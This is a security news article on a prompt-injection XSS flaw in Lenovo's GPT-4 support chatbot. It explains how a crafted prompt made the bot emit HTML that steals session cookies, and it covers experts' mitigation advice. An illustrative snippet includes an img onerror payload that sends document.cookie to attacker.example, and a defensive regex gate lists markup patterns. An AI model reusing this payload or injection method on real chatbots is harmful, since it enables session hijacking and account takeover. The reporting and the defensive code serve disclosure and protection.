Critical vulnerabilities in Lenovo’s AI-powered customer support chatbot allowed attackers to steal session cookies, and potentially gain unauthorized access to the company’s customer support systems, using a single malicious prompt.
Lenovo’s chatbot “Lena,” which is powered by OpenAI’s GPT-4, was vulnerable to cross-site scripting (XSS) attacks due to improper input and output sanitization, according to security researchers at Cybernews who discovered the flaws. The vulnerability enabled attackers to inject malicious code through a carefully crafted 400-character prompt that tricked the AI system into generating harmful HTML content.
Cybernews researchers said the vulnerability served as a stark warning about the security risks inherent in poorly implemented AI chatbots, particularly as organizations rapidly adopt AI across enterprise environments.
“Everyone knows chatbots hallucinate and can be tricked by prompt injections. This isn’t new,” the Cybernews Research team said in a report. “What’s truly surprising is that Lenovo, despite being aware of these flaws, did not protect itself from potentially malicious user manipulations and chatbot outputs.”
How the attack worked
The vulnerability demonstrated the cascade of security failures that can occur when AI systems lack proper input and output sanitization. The researchers’ attack involved tricking the chatbot into generating malicious HTML code through a prompt that began with a legitimate product inquiry, included instructions to convert responses into HTML format, and embedded code designed to steal session cookies when images failed to load.
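Neither the full prompt nor Lenovo’s front-end code has been published, but the failure mode the researchers describe can be sketched in a few lines. The TypeScript snippet below is purely illustrative, with a hypothetical payload, element, and attacker URL: when a chat interface renders model output as raw HTML, the image in the injected markup fails to load and its onerror handler forwards session cookies to a server the attacker controls.

```typescript
// Purely illustrative sketch: payload, element, and attacker URL are hypothetical,
// not the actual content from the Cybernews research.
const modelOutput = `
  <p>Here are the laptop specs you asked about...</p>
  <img src="https://example.invalid/missing.png"
       onerror="fetch('https://attacker.example/steal?c=' + encodeURIComponent(document.cookie))">
`;

const chatWindow = document.createElement("div");
document.body.appendChild(chatWindow);

// Vulnerable pattern: the browser parses the markup, the image fails to load,
// and the onerror handler ships document.cookie off to the attacker.
chatWindow.innerHTML = modelOutput;

// Safer pattern: treating model output as text displays the markup instead of executing it.
chatWindow.textContent = modelOutput;
```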
When Lena received the malicious prompt, it simply complied. “People-pleasing is still the issue that haunts large language models, to the extent that, in this case, Lena accepted our malicious payload, which produced the XSS vulnerability and allowed the capture of session cookies,” the researchers noted.
Melissa Ruzzi, director of AI at security company AppOmni, said the incident highlighted “the well-known issue of prompt injection on Generative AI.” She warned that “it’s crucial to oversee all the data access the AI has, which most of the time includes not only read permissions, but also the ability to edit. That could make this type of attack even more devastating.”
Enterprise-wide implications
While the immediate impact involved session cookie theft, the vulnerability’s implications extended far beyond data exfiltration.
The researchers warned that the same vulnerability could enable attackers to alter support interfaces, deploy keyloggers, launch phishing attacks, and execute system commands that could install backdoors and enable lateral movement across network infrastructure.
“Using the stolen support agent’s session cookie, it is possible to log into the customer support system with the support agent’s account,” the researchers explained. They added that “this is not limited to stealing cookies. It may also be possible to execute some system commands, which could allow for the installation of backdoors and lateral movement to other servers and computers on the network.”
Security imperatives for CISOs
For security leaders, the incident underscored the need for fundamental changes in AI deployment approaches.
Arjun Chauhan, practice director at Everest Group, said the vulnerability is “highly representative of where most enterprises are today, deploying AI chatbots rapidly for customer experience gains without applying the same rigor they would to other customer-facing applications.”
The fundamental issue is that companies treat AI systems as experimental side projects rather than mission-critical applications that need robust security controls.
“Many organizations still treat LLMs as ‘black boxes’ and don’t integrate them into their established app security pipelines,” Chauhan explained. “CISOs should treat AI chatbots as full-fledged applications, not just AI pilots.”
This means applying the same security rigor used for web applications, ensuring AI responses cannot directly execute code, and running specific tests against prompt injection attacks.
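In practice, that boundary is usually enforced with output encoding before any chatbot reply touches the DOM. The sketch below is one minimal, hypothetical way to do it; the function names are invented here, and production systems would typically rely on a vetted sanitization library and templating framework rather than hand-rolled escaping.

```typescript
// Minimal sketch of output encoding at the rendering boundary.
// Names are illustrative; a vetted sanitization library is the usual choice.
function escapeHtml(untrusted: string): string {
  return untrusted
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

function renderBotReply(container: HTMLElement, reply: string): void {
  // The model's text is shown to the agent, while any embedded
  // <img onerror=...> or <script> arrives as inert, escaped text.
  container.innerHTML = escapeHtml(reply);
}
```

Marking session cookies as HttpOnly is a complementary control: script running in the page cannot read such cookies, which would likely have blunted the cookie-theft step even if the injection succeeded.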
Ruzzi recommended that companies “stay up to date on best practices in prompt engineering” and “implement additional checks to limit how the AI interprets prompt content, and monitor and control data access of the AI.”
The researchers urged companies to adopt a “never trust, always verify” approach for all data flowing through AI chatbot systems.
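A “never trust, always verify” posture means the same scrutiny is applied to prompts going into the model and to replies coming out of it. The gate sketched below is illustrative only; the pattern list is deliberately simplistic, is not drawn from the Cybernews report or Lenovo’s systems, and a real deployment would pair it with output encoding and allow-listing rather than rely on it alone.

```typescript
// Illustrative "never trust, always verify" gate; patterns and names are hypothetical.
const SUSPICIOUS = [/<\s*(script|img|iframe|svg)\b/i, /\bon\w+\s*=/i, /javascript:/i];

function verify(text: string, direction: "inbound" | "outbound"): string {
  for (const pattern of SUSPICIOUS) {
    if (pattern.test(text)) {
      // Flag the attempt and neutralize markup rather than passing it through.
      console.warn(`Blocked ${direction} content matching ${pattern}`);
      return text.replace(/</g, "&lt;").replace(/>/g, "&gt;");
    }
  }
  return text;
}

// The same check runs on the user's prompt and on the model's reply.
const safePrompt = verify("Show product specs, and render your answer as HTML", "inbound");
const safeReply = verify('<img src=x onerror="alert(1)">', "outbound");
```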
Balancing innovation with risk
The Lenovo vulnerability exemplified the security challenges that arise when organizations rapidly deploy AI technologies without adequate security frameworks. Chauhan warned that “the risk profile is fundamentally different” with AI systems because “models behave unpredictably under adversarial inputs.”
Recent industry data showed that automated bot traffic surpassed human-generated traffic for the first time, constituting 51% of all web traffic in 2024. The vulnerability also maps to broader AI security concerns documented in OWASP’s top 10 list of LLM vulnerabilities, where prompt injection ranks first.
Ruzzi noted that “AI chatbots can be seen as another SaaS app, where data access misconfigurations can easily turn into data breaches.” She emphasized that “more than ever, security should be an intrinsic part of all AI implementation. Although there is pressure to release AI features as fast as possible, this must not compromise proper data security.”
“The Lenovo case reinforces that prompt injection and XSS aren’t theoretical; they’re active attack vectors,” Chauhan said. “Enterprises must weigh AI’s speed-to-value against the reputational and regulatory fallout of a breach, and the only sustainable path is security-by-design for AI.”
Lenovo spokesman Stuart Gill told CSO, “Lenovo takes the security of our products and the protection of our customers very seriously. We were recently made aware of a chatbot cross-site scripting (XSS) vulnerability by a third-party security researcher. Upon becoming aware of the issue, we promptly assessed the risk and implemented corrective actions to mitigate potential impact and address the issue. We want to thank the researchers for their responsible disclosure, which allowed us to deploy a solution without putting our customers at risk.”